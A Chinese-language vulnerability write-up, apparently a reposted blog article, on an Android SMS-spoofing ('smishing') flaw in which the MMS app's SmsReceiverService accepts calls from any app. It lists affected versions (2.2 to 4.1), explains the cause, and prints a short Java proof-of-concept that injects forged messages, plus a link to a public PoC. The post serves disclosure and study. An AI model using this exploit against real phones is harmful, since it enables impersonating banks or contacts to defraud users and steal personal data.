Android短信欺诈（Smishing）漏洞

本文章由Jack_Jia编写，转载请注明出处。  
文章链接：http://blog.csdn.net/jiazhijun/article/details/8631829
作者：Jack_Jia    邮箱： 309zhijun@163.com

一、漏洞描述

    北卡罗来纳州州立大学研究员日前在进行一项有关智能手机的研究项目中发现了一个存在于Android 平台的“短信欺诈”（Smishing）漏洞，据悉，该漏洞可以允许应用在Android平台上进行短信伪装，且在所有版本的Android软件中都存在这一漏洞。

  攻击者可利用漏洞窃取个人资料，攻击者也可以利用漏洞，将自己的手机号码伪装成银行或亲友等号码。

二、影响版本

    Froyo (2.2.x), Gingerbread (2.3.x), Ice Cream Sandwich (4.0.x), and Jelly Bean (4.1)

三、漏洞原理

    Android系统有一套比较完善的安全体系，权限管理就是其中的一部分。当应用需要操作敏感数据时，需要申请相应的权限。

    该系统漏洞能够使攻击者无需申请任何权限发送短信到用户收件箱。

    出现该漏洞的原因是Android系统的com.android.mms.transaction.SmsReceiverService系统服务未判断启动服务的调用者，攻击者可以通过该应用发送伪装短信到用户收件箱。本漏洞实质上是一种能力的泄漏。

四、POC代码

    Intent intent = new Intent();

    byte[] pdus = new byte[]{...}; // the sms pdus bytes

    intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiverService");

    intent.setAction("android.provider.Telephony.SMS_RECEIVED");

    intent.putExtra("pdus", new byte[][]{pdus});

    this.startService(intent); 

   开源POC:https://github.com/thomascannon/android-sms-spoof

五、相关链接

    http://www.csc.ncsu.edu/faculty/jiang/smishing.html

    http://www.newhua.com/2012/1109/183383.shtml